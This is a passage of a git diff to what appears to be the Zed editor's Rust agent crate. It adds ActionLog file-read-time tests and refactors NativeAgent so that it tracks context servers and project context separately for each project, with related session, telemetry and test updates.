project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + let abs_path = PathBuf::from(path!("/dir/file")); + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_none()), + "file_read_time should be None before buffer_created" + ); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_created(buffer.clone(), cx)); + }); + + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_some()), + "file_read_time should be recorded after buffer_created" + ); + } + + #[gpui::test] + async fn test_file_read_time_removed_on_delete(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "hello world"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + let abs_path = PathBuf::from(path!("/dir/file")); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + }); + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_some()), + "file_read_time should exist after buffer_read" + ); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.will_delete_buffer(buffer.clone(), cx)); + }); + assert!( + action_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_none()), + "file_read_time should be removed after will_delete_buffer" + ); + } + + #[gpui::test] + async fn test_file_read_time_not_forwarded_to_linked_action_log(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + 
fs.insert_tree(path!("/dir"), json!({"file": "hello world"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let parent_log = cx.new(|_| ActionLog::new(project.clone())); + let child_log = + cx.new(|_| ActionLog::new(project.clone()).with_linked_action_log(parent_log.clone())); + + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + let abs_path = PathBuf::from(path!("/dir/file")); + + cx.update(|cx| { + child_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + }); + assert!( + child_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_some()), + "child should record file_read_time on buffer_read" + ); + assert!( + parent_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_none()), + "parent should NOT get file_read_time from child's buffer_read" + ); + + cx.update(|cx| { + child_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + assert!( + parent_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_none()), + "parent should NOT get file_read_time from child's buffer_edited" + ); + + cx.update(|cx| { + child_log.update(cx, |log, cx| log.buffer_created(buffer.clone(), cx)); + }); + assert!( + parent_log.read_with(cx, |log, _| log.file_read_time(&abs_path).is_none()), + "parent should NOT get file_read_time from child's buffer_created" + ); + } + #[derive(Debug, PartialEq)] struct HunkStatus { range: Range, diff --git a/crates/activity_indicator/Cargo.toml b/crates/activity_indicator/Cargo.toml index 99ae5b5b077a14c0909737d64935220698a007c7..ce53f23365d57666e25cac434935514fc4bd7e3f 100644 --- a/crates/activity_indicator/Cargo.toml +++ b/crates/activity_indicator/Cargo.toml @@ -30,4 +30,4 @@ workspace.workspace = true [dev-dependencies] editor = { workspace = true, features = ["test-support"] } 
-release_channel.workspace = true + diff --git a/crates/agent/Cargo.toml b/crates/agent/Cargo.toml index 9f563cf0b1b009a496d36a6f090b0f4b476433a7..a5a4c2742a444bf2e8b0a12b0bb233c6e51684f2 100644 --- a/crates/agent/Cargo.toml +++ b/crates/agent/Cargo.toml @@ -10,7 +10,6 @@ path = "src/agent.rs" [features] test-support = ["db/test-support"] -eval = [] unit-eval = [] e2e = [] @@ -100,9 +99,9 @@ rand.workspace = true reqwest_client.workspace = true settings = { workspace = true, "features" = ["test-support"] } tempfile.workspace = true -terminal = { workspace = true, "features" = ["test-support"] } + theme = { workspace = true, "features" = ["test-support"] } -tree-sitter-rust.workspace = true + unindent = { workspace = true } -worktree = { workspace = true, "features" = ["test-support"] } + zlog.workspace = true diff --git a/crates/agent/src/agent.rs b/crates/agent/src/agent.rs index 85b943da4bb65b038100b2b842d81bc34662325d..b7aa9d1e311016f572928993e049798c2b5e3bb2 100644 --- a/crates/agent/src/agent.rs +++ b/crates/agent/src/agent.rs @@ -14,6 +14,7 @@ mod tools; use context_server::ContextServerId; pub use db::*; +use itertools::Itertools; pub use native_agent_server::NativeAgentServer; pub use pattern_extraction::*; pub use shell_command_parser::extract_commands; @@ -36,10 +37,11 @@ use futures::channel::{mpsc, oneshot}; use futures::future::Shared; use futures::{FutureExt as _, StreamExt as _, future}; use gpui::{ - App, AppContext, AsyncApp, Context, Entity, SharedString, Subscription, Task, WeakEntity, + App, AppContext, AsyncApp, Context, Entity, EntityId, SharedString, Subscription, Task, + WeakEntity, }; use language_model::{IconOrSvg, LanguageModel, LanguageModelProvider, LanguageModelRegistry}; -use project::{Project, ProjectItem, ProjectPath, Worktree}; +use project::{AgentId, Project, ProjectItem, ProjectPath, Worktree}; use prompt_store::{ ProjectContext, PromptStore, RULES_FILE_NAMES, RulesFileContext, UserRulesContext, WorktreeContext, @@ -47,9 +49,9 @@ 
use prompt_store::{ use serde::{Deserialize, Serialize}; use settings::{LanguageModelSelection, update_settings_file}; use std::any::Any; -use std::path::{Path, PathBuf}; +use std::path::PathBuf; use std::rc::Rc; -use std::sync::Arc; +use std::sync::{Arc, LazyLock}; use util::ResultExt; use util::path_list::PathList; use util::rel_path::RelPath; @@ -64,13 +66,23 @@ pub struct RulesLoadingError { pub message: SharedString, } +struct ProjectState { + project: Entity, + project_context: Entity, + project_context_needs_refresh: watch::Sender<()>, + _maintain_project_context: Task>, + context_server_registry: Entity, + _subscriptions: Vec, +} + /// Holds both the internal Thread and the AcpThread for a session struct Session { /// The internal thread that processes messages thread: Entity, /// The ACP thread that handles protocol communication acp_thread: Entity, - pending_save: Task<()>, + project_id: EntityId, + pending_save: Task>, _subscriptions: Vec, } @@ -234,79 +246,47 @@ pub struct NativeAgent { /// Session ID -> Session mapping sessions: HashMap, thread_store: Entity, - /// Shared project context for all threads - project_context: Entity, - project_context_needs_refresh: watch::Sender<()>, - _maintain_project_context: Task>, - context_server_registry: Entity, + /// Project-specific state keyed by project EntityId + projects: HashMap, /// Shared templates for all threads templates: Arc, /// Cached model information models: LanguageModels, - project: Entity, prompt_store: Option>, fs: Arc, _subscriptions: Vec, } impl NativeAgent { - pub async fn new( - project: Entity, + pub fn new( thread_store: Entity, templates: Arc, prompt_store: Option>, fs: Arc, - cx: &mut AsyncApp, - ) -> Result> { + cx: &mut App, + ) -> Entity { log::debug!("Creating new NativeAgent"); - let project_context = cx - .update(|cx| Self::build_project_context(&project, prompt_store.as_ref(), cx)) - .await; - - Ok(cx.new(|cx| { - let context_server_store = 
project.read(cx).context_server_store(); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx)); - - let mut subscriptions = vec![ - cx.subscribe(&project, Self::handle_project_event), - cx.subscribe( - &LanguageModelRegistry::global(cx), - Self::handle_models_updated_event, - ), - cx.subscribe( - &context_server_store, - Self::handle_context_server_store_updated, - ), - cx.subscribe( - &context_server_registry, - Self::handle_context_server_registry_event, - ), - ]; + cx.new(|cx| { + let mut subscriptions = vec![cx.subscribe( + &LanguageModelRegistry::global(cx), + Self::handle_models_updated_event, + )]; if let Some(prompt_store) = prompt_store.as_ref() { subscriptions.push(cx.subscribe(prompt_store, Self::handle_prompts_updated_event)) } - let (project_context_needs_refresh_tx, project_context_needs_refresh_rx) = - watch::channel(()); Self { sessions: HashMap::default(), thread_store, - project_context: cx.new(|_| project_context), - project_context_needs_refresh: project_context_needs_refresh_tx, - _maintain_project_context: cx.spawn(async move |this, cx| { - Self::maintain_project_context(this, project_context_needs_refresh_rx, cx).await - }), - context_server_registry, + projects: HashMap::default(), templates, models: LanguageModels::new(cx), - project, prompt_store, fs, _subscriptions: subscriptions, } - })) + }) } fn new_session( @@ -314,10 +294,10 @@ impl NativeAgent { project: Entity, cx: &mut Context, ) -> Entity { - // Create Thread - // Fetch default model from registry settings + let project_id = self.get_or_create_project_state(&project, cx); + let project_state = &self.projects[&project_id]; + let registry = LanguageModelRegistry::read_global(cx); - // Log available models for debugging let available_count = registry.available_models(cx).count(); log::debug!("Total available models: {}", available_count); @@ -327,21 +307,22 @@ impl NativeAgent { }); let thread = cx.new(|cx| { Thread::new( - 
project.clone(), - self.project_context.clone(), - self.context_server_registry.clone(), + project, + project_state.project_context.clone(), + project_state.context_server_registry.clone(), self.templates.clone(), default_model, cx, ) }); - self.register_session(thread, cx) + self.register_session(thread, project_id, cx) } fn register_session( &mut self, thread_handle: Entity, + project_id: EntityId, cx: &mut Context, ) -> Entity { let connection = Rc::new(NativeAgentConnection(cx.entity())); @@ -350,20 +331,28 @@ impl NativeAgent { let session_id = thread.id().clone(); let parent_session_id = thread.parent_thread_id(); let title = thread.title(); + let draft_prompt = thread.draft_prompt().map(Vec::from); + let scroll_position = thread.ui_scroll_position(); + let token_usage = thread.latest_token_usage(); let project = thread.project.clone(); let action_log = thread.action_log.clone(); let prompt_capabilities_rx = thread.prompt_capabilities_rx.clone(); let acp_thread = cx.new(|cx| { - acp_thread::AcpThread::new( + let mut acp_thread = acp_thread::AcpThread::new( parent_session_id, title, + None, connection, project.clone(), action_log.clone(), session_id.clone(), prompt_capabilities_rx, cx, - ) + ); + acp_thread.set_draft_prompt(draft_prompt); + acp_thread.set_ui_scroll_position(scroll_position); + acp_thread.update_token_usage(token_usage, cx); + acp_thread }); let registry = LanguageModelRegistry::read_global(cx); @@ -396,12 +385,13 @@ impl NativeAgent { Session { thread: thread_handle, acp_thread: acp_thread.clone(), + project_id, _subscriptions: subscriptions, - pending_save: Task::ready(()), + pending_save: Task::ready(Ok(())), }, ); - self.update_available_commands(cx); + self.update_available_commands_for_project(project_id, cx); acp_thread } @@ -410,19 +400,106 @@ impl NativeAgent { &self.models } + fn get_or_create_project_state( + &mut self, + project: &Entity, + cx: &mut Context, + ) -> EntityId { + let project_id = project.entity_id(); + if 
self.projects.contains_key(&project_id) { + return project_id; + } + + let project_context = cx.new(|_| ProjectContext::new(vec![], vec![])); + self.register_project_with_initial_context(project.clone(), project_context, cx); + if let Some(state) = self.projects.get_mut(&project_id) { + state.project_context_needs_refresh.send(()).ok(); + } + project_id + } + + fn register_project_with_initial_context( + &mut self, + project: Entity, + project_context: Entity, + cx: &mut Context, + ) { + let project_id = project.entity_id(); + + let context_server_store = project.read(cx).context_server_store(); + let context_server_registry = + cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx)); + + let subscriptions = vec![ + cx.subscribe(&project, Self::handle_project_event), + cx.subscribe( + &context_server_store, + Self::handle_context_server_store_updated, + ), + cx.subscribe( + &context_server_registry, + Self::handle_context_server_registry_event, + ), + ]; + + let (project_context_needs_refresh_tx, project_context_needs_refresh_rx) = + watch::channel(()); + + self.projects.insert( + project_id, + ProjectState { + project, + project_context, + project_context_needs_refresh: project_context_needs_refresh_tx, + _maintain_project_context: cx.spawn(async move |this, cx| { + Self::maintain_project_context( + this, + project_id, + project_context_needs_refresh_rx, + cx, + ) + .await + }), + context_server_registry, + _subscriptions: subscriptions, + }, + ); + } + + fn session_project_state(&self, session_id: &acp::SessionId) -> Option<&ProjectState> { + self.sessions + .get(session_id) + .and_then(|session| self.projects.get(&session.project_id)) + } + async fn maintain_project_context( this: WeakEntity, + project_id: EntityId, mut needs_refresh: watch::Receiver<()>, cx: &mut AsyncApp, ) -> Result<()> { while needs_refresh.changed().await.is_ok() { let project_context = this .update(cx, |this, cx| { - Self::build_project_context(&this.project, 
this.prompt_store.as_ref(), cx) - })? + let state = this + .projects + .get(&project_id) + .context("project state not found")?; + anyhow::Ok(Self::build_project_context( + &state.project, + this.prompt_store.as_ref(), + cx, + )) + })?? .await; this.update(cx, |this, cx| { - this.project_context = cx.new(|_| project_context); + if let Some(state) = this.projects.get(&project_id) { + state + .project_context + .update(cx, |current_project_context, _cx| { + *current_project_context = project_context; + }); + } })?; } @@ -585,12 +662,17 @@ impl NativeAgent { let Some(session) = self.sessions.get(session_id) else { return; }; + let thread = thread.downgrade(); let acp_thread = session.acp_thread.downgrade(); cx.spawn(async move |_, cx| { let title = thread.read_with(cx, |thread, _| thread.title())?; - let task = acp_thread.update(cx, |acp_thread, cx| acp_thread.set_title(title, cx))?; - task.await + if let Some(title) = title { + let task = + acp_thread.update(cx, |acp_thread, cx| acp_thread.set_title(title, cx))?; + task.await?; + } + anyhow::Ok(()) }) .detach_and_log_err(cx); } @@ -611,13 +693,17 @@ impl NativeAgent { fn handle_project_event( &mut self, - _project: Entity, + project: Entity, event: &project::Event, _cx: &mut Context, ) { + let project_id = project.entity_id(); + let Some(state) = self.projects.get_mut(&project_id) else { + return; + }; match event { project::Event::WorktreeAdded(_) | project::Event::WorktreeRemoved(_) => { - self.project_context_needs_refresh.send(()).ok(); + state.project_context_needs_refresh.send(()).ok(); } project::Event::WorktreeUpdatedEntries(_, items) => { if items.iter().any(|(path, _, _)| { @@ -625,7 +711,7 @@ impl NativeAgent { .iter() .any(|name| path.as_ref() == RelPath::unix(name).unwrap()) }) { - self.project_context_needs_refresh.send(()).ok(); + state.project_context_needs_refresh.send(()).ok(); } } _ => {} @@ -638,13 +724,15 @@ impl NativeAgent { _event: &prompt_store::PromptsUpdatedEvent, _cx: &mut Context, ) { - 
self.project_context_needs_refresh.send(()).ok(); + for state in self.projects.values_mut() { + state.project_context_needs_refresh.send(()).ok(); + } } fn handle_models_updated_event( &mut self, _registry: Entity, - _event: &language_model::Event, + event: &language_model::Event, cx: &mut Context, ) { self.models.refresh_list(cx); @@ -661,37 +749,65 @@ impl NativeAgent { thread.set_model(model, cx); cx.notify(); } - thread.set_summarization_model(summarization_model.clone(), cx); + if let Some(model) = summarization_model.clone() { + if thread.summarization_model().is_none() + || matches!(event, language_model::Event::ThreadSummaryModelChanged) + { + thread.set_summarization_model(Some(model), cx); + } + } }); } } fn handle_context_server_store_updated( &mut self, - _store: Entity, + store: Entity, _event: &project::context_server_store::ServerStatusChangedEvent, cx: &mut Context, ) { - self.update_available_commands(cx); + let project_id = self.projects.iter().find_map(|(id, state)| { + if *state.context_server_registry.read(cx).server_store() == store { + Some(*id) + } else { + None + } + }); + if let Some(project_id) = project_id { + self.update_available_commands_for_project(project_id, cx); + } } fn handle_context_server_registry_event( &mut self, - _registry: Entity, + registry: Entity, event: &ContextServerRegistryEvent, cx: &mut Context, ) { match event { ContextServerRegistryEvent::ToolsChanged => {} ContextServerRegistryEvent::PromptsChanged => { - self.update_available_commands(cx); + let project_id = self.projects.iter().find_map(|(id, state)| { + if state.context_server_registry == registry { + Some(*id) + } else { + None + } + }); + if let Some(project_id) = project_id { + self.update_available_commands_for_project(project_id, cx); + } } } } - fn update_available_commands(&self, cx: &mut Context) { - let available_commands = self.build_available_commands(cx); + fn update_available_commands_for_project(&self, project_id: EntityId, cx: &mut Context) { 
+ let available_commands = + Self::build_available_commands_for_project(self.projects.get(&project_id), cx); for session in self.sessions.values() { + if session.project_id != project_id { + continue; + } session.acp_thread.update(cx, |thread, cx| { thread .handle_session_update( @@ -705,8 +821,14 @@ impl NativeAgent { } } - fn build_available_commands(&self, cx: &App) -> Vec { - let registry = self.context_server_registry.read(cx); + fn build_available_commands_for_project( + project_state: Option<&ProjectState>, + cx: &App, + ) -> Vec { + let Some(state) = project_state else { + return vec![]; + }; + let registry = state.context_server_registry.read(cx); let mut prompt_name_counts: HashMap<&str, usize> = HashMap::default(); for context_server_prompt in registry.prompts() { @@ -760,6 +882,7 @@ impl NativeAgent { pub fn load_thread( &mut self, id: acp::SessionId, + project: Entity, cx: &mut Context, ) -> Task>> { let database_future = ThreadsDatabase::connect(cx); @@ -771,46 +894,57 @@ impl NativeAgent { .with_context(|| format!("no thread found with ID: {id:?}"))?; this.update(cx, |this, cx| { + let project_id = this.get_or_create_project_state(&project, cx); + let project_state = this + .projects + .get(&project_id) + .context("project state not found")?; let summarization_model = LanguageModelRegistry::read_global(cx) .thread_summary_model() .map(|c| c.model); - cx.new(|cx| { + Ok(cx.new(|cx| { let mut thread = Thread::from_db( id.clone(), db_thread, - this.project.clone(), - this.project_context.clone(), - this.context_server_registry.clone(), + project_state.project.clone(), + project_state.project_context.clone(), + project_state.context_server_registry.clone(), this.templates.clone(), cx, ); thread.set_summarization_model(summarization_model, cx); thread - }) - }) + })) + })? 
}) } pub fn open_thread( &mut self, id: acp::SessionId, + project: Entity, cx: &mut Context, ) -> Task>> { if let Some(session) = self.sessions.get(&id) { return Task::ready(Ok(session.acp_thread.clone())); } - let task = self.load_thread(id, cx); + let task = self.load_thread(id, project.clone(), cx); cx.spawn(async move |this, cx| { let thread = task.await?; - let acp_thread = - this.update(cx, |this, cx| this.register_session(thread.clone(), cx))?; + let acp_thread = this.update(cx, |this, cx| { + let project_id = this.get_or_create_project_state(&project, cx); + this.register_session(thread.clone(), project_id, cx) + })?; let events = thread.update(cx, |thread, cx| thread.replay(cx)); cx.update(|cx| { NativeAgentConnection::handle_thread_events(events, acp_thread.downgrade(), cx) }) .await?; + acp_thread.update(cx, |thread, cx| { + thread.snapshot_completed_plan(cx); + }); Ok(acp_thread) }) } @@ -818,9 +952,10 @@ impl NativeAgent { pub fn thread_summary( &mut self, id: acp::SessionId, + project: Entity, cx: &mut Context, ) -> Task> { - let thread = self.open_thread(id.clone(), cx); + let thread = self.open_thread(id.clone(), project, cx); cx.spawn(async move |this, cx| { let acp_thread = thread.await?; let result = this @@ -843,15 +978,18 @@ impl NativeAgent { return; } - let database_future = ThreadsDatabase::connect(cx); - let (id, db_thread) = - thread.update(cx, |thread, cx| (thread.id().clone(), thread.to_db(cx))); + let id = thread.read(cx).id().clone(); let Some(session) = self.sessions.get_mut(&id) else { return; }; + let project_id = session.project_id; + let Some(state) = self.projects.get(&project_id) else { + return; + }; + let folder_paths = PathList::new( - &self + &state .project .read(cx) .visible_worktrees(cx) @@ -859,10 +997,16 @@ impl NativeAgent { .collect::>(), ); + let draft_prompt = session.acp_thread.read(cx).draft_prompt().map(Vec::from); + let database_future = ThreadsDatabase::connect(cx); + let db_thread = thread.update(cx, |thread, 
cx| { + thread.set_draft_prompt(draft_prompt); + thread.to_db(cx) + }); let thread_store = self.thread_store.clone(); session.pending_save = cx.spawn(async move |_, cx| { let Some(database) = database_future.await.map_err(|err| anyhow!(err)).log_err() else { - return; + return Ok(()); }; let db_thread = db_thread.await; database @@ -870,21 +1014,29 @@ impl NativeAgent { .await .log_err(); thread_store.update(cx, |store, cx| store.reload(cx)); + Ok(()) }); } fn send_mcp_prompt( &self, message_id: UserMessageId, - session_id: agent_client_protocol::SessionId, + session_id: acp::SessionId, prompt_name: String, server_id: ContextServerId, arguments: HashMap, original_content: Vec, cx: &mut Context, ) -> Task> { - let server_store = self.context_server_registry.read(cx).server_store().clone(); - let path_style = self.project.read(cx).path_style(cx); + let Some(state) = self.session_project_state(&session_id) else { + return Task::ready(Err(anyhow!("Project state not found for session"))); + }; + let server_store = state + .context_server_registry + .read(cx) + .server_store() + .clone(); + let path_style = state.project.read(cx).path_style(cx); cx.spawn(async move |this, cx| { let prompt = @@ -983,8 +1135,14 @@ impl NativeAgentConnection { .map(|session| session.thread.clone()) } - pub fn load_thread(&self, id: acp::SessionId, cx: &mut App) -> Task>> { - self.0.update(cx, |this, cx| this.load_thread(id, cx)) + pub fn load_thread( + &self, + id: acp::SessionId, + project: Entity, + cx: &mut App, + ) -> Task>> { + self.0 + .update(cx, |this, cx| this.load_thread(id, project, cx)) } fn run_turn( @@ -1055,12 +1213,11 @@ impl NativeAgentConnection { thread.request_tool_call_authorization(tool_call, options, cx) })??; cx.background_spawn(async move { - if let acp::RequestPermissionOutcome::Selected( - acp::SelectedPermissionOutcome { option_id, .. 
}, - ) = outcome_task.await + if let acp_thread::RequestPermissionOutcome::Selected(outcome) = + outcome_task.await { response - .send(option_id) + .send(outcome) .map(|_| anyhow!("authorization receiver was dropped")) .log_err(); } @@ -1077,6 +1234,9 @@ impl NativeAgentConnection { thread.update_tool_call(update, cx) })??; } + ThreadEvent::Plan(plan) => { + acp_thread.update(cx, |thread, cx| thread.update_plan(plan, cx))?; + } ThreadEvent::SubagentSpawned(session_id) => { acp_thread.update(cx, |thread, cx| { thread.subagent_spawned(session_id, cx); @@ -1242,7 +1402,13 @@ impl acp_thread::AgentModelSelector for NativeAgentModelSelector { } } +pub static ZED_AGENT_ID: LazyLock = LazyLock::new(|| AgentId::new("Zed Agent")); + impl acp_thread::AgentConnection for NativeAgentConnection { + fn agent_id(&self) -> AgentId { + ZED_AGENT_ID.clone() + } + fn telemetry_id(&self) -> SharedString { "zed".into() } @@ -1250,10 +1416,10 @@ impl acp_thread::AgentConnection for NativeAgentConnection { fn new_session( self: Rc, project: Entity, - cwd: &Path, + work_dirs: PathList, cx: &mut App, ) -> Task>> { - log::debug!("Creating new thread for project at: {cwd:?}"); + log::debug!("Creating new thread for project at: {work_dirs:?}"); Task::ready(Ok(self .0 .update(cx, |agent, cx| agent.new_session(project, cx)))) @@ -1265,24 +1431,43 @@ impl acp_thread::AgentConnection for NativeAgentConnection { fn load_session( self: Rc, - session: AgentSessionInfo, - _project: Entity, - _cwd: &Path, + session_id: acp::SessionId, + project: Entity, + _work_dirs: PathList, + _title: Option, cx: &mut App, ) -> Task>> { self.0 - .update(cx, |agent, cx| agent.open_thread(session.session_id, cx)) + .update(cx, |agent, cx| agent.open_thread(session_id, project, cx)) } fn supports_close_session(&self) -> bool { true } - fn close_session(&self, session_id: &acp::SessionId, cx: &mut App) -> Task> { - self.0.update(cx, |agent, _cx| { - agent.sessions.remove(session_id); - }); - Task::ready(Ok(())) + fn 
close_session( + self: Rc, + session_id: &acp::SessionId, + cx: &mut App, + ) -> Task> { + self.0.update(cx, |agent, cx| { + let thread = agent.sessions.get(session_id).map(|s| s.thread.clone()); + if let Some(thread) = thread { + agent.save_thread(thread, cx); + } + + let Some(session) = agent.sessions.remove(session_id) else { + return Task::ready(Ok(())); + }; + let project_id = session.project_id; + + let has_remaining = agent.sessions.values().any(|s| s.project_id == project_id); + if !has_remaining { + agent.projects.remove(&project_id); + } + + session.pending_save + }) } fn auth_methods(&self) -> &[acp::AuthMethod] { @@ -1311,8 +1496,12 @@ impl acp_thread::AgentConnection for NativeAgentConnection { log::info!("Received prompt request for session: {}", session_id); log::debug!("Prompt blocks count: {}", params.prompt.len()); + let Some(project_state) = self.0.read(cx).session_project_state(&session_id) else { + return Task::ready(Err(anyhow::anyhow!("Session not found"))); + }; + if let Some(parsed_command) = Command::parse(¶ms.prompt) { - let registry = self.0.read(cx).context_server_registry.read(cx); + let registry = project_state.context_server_registry.read(cx); let explicit_server_id = parsed_command .explicit_server_id @@ -1348,10 +1537,10 @@ impl acp_thread::AgentConnection for NativeAgentConnection { cx, ) }); - }; + } }; - let path_style = self.0.read(cx).project.read(cx).path_style(cx); + let path_style = project_state.project.read(cx).path_style(cx); self.run_turn(session_id, cx, move |thread, cx| { let content: Vec = params @@ -1392,7 +1581,7 @@ impl acp_thread::AgentConnection for NativeAgentConnection { fn truncate( &self, - session_id: &agent_client_protocol::SessionId, + session_id: &acp::SessionId, cx: &App, ) -> Option> { self.0.read_with(cx, |agent, _cx| { @@ -1478,16 +1667,6 @@ impl NativeAgentSessionList { } } - fn to_session_info(entry: DbThreadMetadata) -> AgentSessionInfo { - AgentSessionInfo { - session_id: entry.id, - cwd: None, - 
title: Some(entry.title), - updated_at: Some(entry.updated_at), - meta: None, - } - } - pub fn thread_store(&self) -> &Entity { &self.thread_store } @@ -1503,7 +1682,7 @@ impl AgentSessionList for NativeAgentSessionList { .thread_store .read(cx) .entries() - .map(Self::to_session_info) + .map(|entry| AgentSessionInfo::from(&entry)) .collect(); Task::ready(Ok(AgentSessionListResponse::new(sessions))) } @@ -1607,6 +1786,7 @@ impl NativeThreadEnvironment { }; let parent_thread = parent_thread_entity.read(cx); let current_depth = parent_thread.depth(); + let parent_session_id = parent_thread.id().clone(); if current_depth >= MAX_SUBAGENT_DEPTH { return Err(anyhow!( @@ -1623,9 +1803,26 @@ impl NativeThreadEnvironment { let session_id = subagent_thread.read(cx).id().clone(); - let acp_thread = self.agent.update(cx, |agent, cx| { - agent.register_session(subagent_thread.clone(), cx) - })?; + let acp_thread = self + .agent + .update(cx, |agent, cx| -> Result> { + let project_id = agent + .sessions + .get(&parent_session_id) + .map(|s| s.project_id) + .context("parent session not found")?; + Ok(agent.register_session(subagent_thread.clone(), project_id, cx)) + })??; + + let depth = current_depth + 1; + + telemetry::event!( + "Subagent Started", + session = parent_thread_entity.read(cx).id().to_string(), + subagent_session = session_id.to_string(), + depth, + is_resumed = false, + ); self.prompt_subagent(session_id, subagent_thread, acp_thread) } @@ -1643,6 +1840,18 @@ impl NativeThreadEnvironment { anyhow::Ok((session.thread.clone(), session.acp_thread.clone())) })??; + let depth = subagent_thread.read(cx).depth(); + + if let Some(parent_thread_entity) = self.thread.upgrade() { + telemetry::event!( + "Subagent Started", + session = parent_thread_entity.read(cx).id().to_string(), + subagent_session = session_id.to_string(), + depth, + is_resumed = true, + ); + } + self.prompt_subagent(session_id, subagent_thread, acp_thread) } @@ -1747,6 +1956,10 @@ impl SubagentHandle for 
NativeSubagentHandle { self.session_id.clone() } + fn num_entries(&self, cx: &App) -> usize { + self.acp_thread.read(cx).entries().len() + } + fn send(&self, message: String, cx: &AsyncApp) -> Task> { let thread = self.subagent_thread.clone(); let acp_thread = self.acp_thread.clone(); @@ -1819,10 +2032,24 @@ impl SubagentHandle for NativeSubagentHandle { SubagentPromptResult::Completed => thread.read_with(cx, |thread, _cx| { thread .last_message() - .map(|m| m.to_markdown()) + .and_then(|message| { + let content = message.as_agent_message()? + .content + .iter() + .filter_map(|c| match c { + AgentMessageContent::Text(text) => Some(text.as_str()), + _ => None, + }) + .join("\n\n"); + if content.is_empty() { + None + } else { + Some( content) + } + }) .context("No response from subagent") }), - SubagentPromptResult::Cancelled => Err(anyhow!("User cancelled")), + SubagentPromptResult::Cancelled => Err(anyhow!("User canceled")), SubagentPromptResult::Error(message) => Err(anyhow!("{message}")), SubagentPromptResult::ContextWindowWarning => { thread.update(cx, |thread, cx| thread.cancel(cx)).await; @@ -1885,13 +2112,17 @@ impl TerminalHandle for AcpTerminalHandle { #[cfg(test)] mod internal_tests { + use std::path::Path; + use super::*; use acp_thread::{AgentConnection, AgentModelGroupName, AgentModelInfo, MentionUri}; use fs::FakeFs; use gpui::TestAppContext; use indoc::formatdoc; use language_model::fake_provider::{FakeLanguageModel, FakeLanguageModelProvider}; - use language_model::{LanguageModelProviderId, LanguageModelProviderName}; + use language_model::{ + LanguageModelCompletionEvent, LanguageModelProviderId, LanguageModelProviderName, + }; use serde_json::json; use settings::SettingsStore; use util::{path, rel_path::rel_path}; @@ -1909,18 +2140,32 @@ mod internal_tests { .await; let project = Project::test(fs.clone(), [], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store, - 
Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); + + // Creating a session registers the project and triggers context building. + let connection = NativeAgentConnection(agent.clone()); + let _acp_thread = cx + .update(|cx| { + Rc::new(connection).new_session( + project.clone(), + PathList::new(&[Path::new("/")]), + cx, + ) + }) + .await + .unwrap(); + cx.run_until_parked(); + + let thread = agent.read_with(cx, |agent, _cx| { + agent.sessions.values().next().unwrap().thread.clone() + }); + agent.read_with(cx, |agent, cx| { - assert_eq!(agent.project_context.read(cx).worktrees, vec![]) + let project_id = project.entity_id(); + let state = agent.projects.get(&project_id).unwrap(); + assert_eq!(state.project_context.read(cx).worktrees, vec![]); + assert_eq!(thread.read(cx).project_context().read(cx).worktrees, vec![]); }); let worktree = project @@ -1929,36 +2174,44 @@ mod internal_tests { .unwrap(); cx.run_until_parked(); agent.read_with(cx, |agent, cx| { + let project_id = project.entity_id(); + let state = agent.projects.get(&project_id).unwrap(); + let expected_worktrees = vec![WorktreeContext { + root_name: "a".into(), + abs_path: Path::new("/a").into(), + rules_file: None, + }]; + assert_eq!(state.project_context.read(cx).worktrees, expected_worktrees); assert_eq!( - agent.project_context.read(cx).worktrees, - vec![WorktreeContext { - root_name: "a".into(), - abs_path: Path::new("/a").into(), - rules_file: None - }] - ) + thread.read(cx).project_context().read(cx).worktrees, + expected_worktrees + ); }); // Creating `/a/.rules` updates the project context. 
